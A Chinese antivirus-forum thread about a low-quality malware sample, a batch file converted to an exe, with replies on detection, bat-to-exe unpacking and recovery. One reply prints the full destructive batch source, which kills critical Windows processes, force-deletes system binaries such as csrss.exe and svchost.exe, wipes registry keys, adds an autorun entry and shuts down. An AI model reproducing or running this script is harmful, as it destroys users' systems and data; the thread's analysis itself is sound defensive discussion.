病毒病毒，bat转的病毒。

显示全部楼层 · 发表于 2020-8-6 11:23:48

αdmin 发表于 2020-8-6 10:41
我就双击了一下看看会怎样

sfc/scannow

显示全部楼层 · 发表于 2020-8-6 11:25:02

卡巴斯基

显示全部楼层 · 发表于 2020-8-6 11:48:37

exe 诺顿 C杀

显示全部楼层 · 发表于 2020-8-6 14:46:57

exe属于loader，释放bat在临时目录里，这种低质量样本就别发了吧

显示全部楼层 · 发表于 2020-8-6 14:47:31

川建国代理人发表于 2020-8-6 10:42
转完之后运行还是这串代码啊，除了运行方式改变，并没有大改变

bat可以直接看到源码，exe不行，所以报毒名会变

显示全部楼层 · 发表于 2020-8-6 17:12:01

本帖最后由 WAR314159 于 2020-8-6 17:18 编辑

Win32/TrojanDropper.Delf.NXM（包名：adminbat.7z）ESET在2011-08-05已检测到
报毒名截图

显示全部楼层 · 发表于 2020-8-6 17:12:27

本帖最后由 WAR314159 于 2020-8-6 17:15 编辑

αdmin 发表于 2020-8-6 10:39
哇，我运行了删了好多东西系统出错了怎么办？

重装系统吧
@echo off
taskkill /f /im explorer.exe
taskkill /f /im taskmgr.exe
taskkill /f /im winlogon.exe
taskkill /f /im dwm.exe
taskkill /f /im csrss.exe
del /f %SystemRoot%\System32\csrss.exe
del /f C:\windows\explorer.exe
del /f C:\windows\System32\cmd.exe
del /f C:\windows\System32\taskmgr.exe
del /f C:\windows\System32\svchost.exe
del /f C:\windows\user\shunli
del /f \SystemRoot\System32\smss.exe
del /f C:\windows\System32\lsm.exe
del /f C:\windows\System32\dwm.exe
START reg delete HKCR/*
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v AUTORUN /t REG_SZ /d C:\user\shunli\Desktop\admin.bat /f
shutdown /s /t 0

显示全部楼层 · 发表于 2020-8-7 14:08:32

ZNKZZ. 发表于 2020-8-6 10:34
低质量样本

真的低质量。。。就结束进程和删文件之类的。。。镜像恢复就可以解决。。。

显示全部楼层 · 发表于 2020-8-7 15:10:10

nich 发表于 2020-8-6 10:44
为什么exe会释放？我写bat时也没想啊？？？？？？？？？？？

bat转exe的原理，就是把bat放到exe里面，每次打开都会释放bat到缓存目录等然后运行

显示全部楼层 · 发表于 2020-8-7 22:08:24

ZNKZZ. 发表于 2020-8-6 10:34
低质量样本

额，这不就是暴力***吗

[病毒样本] 病毒病毒，bat转的病毒。

本帖子中包含更多资源

本帖子中包含更多资源

浏览过的版块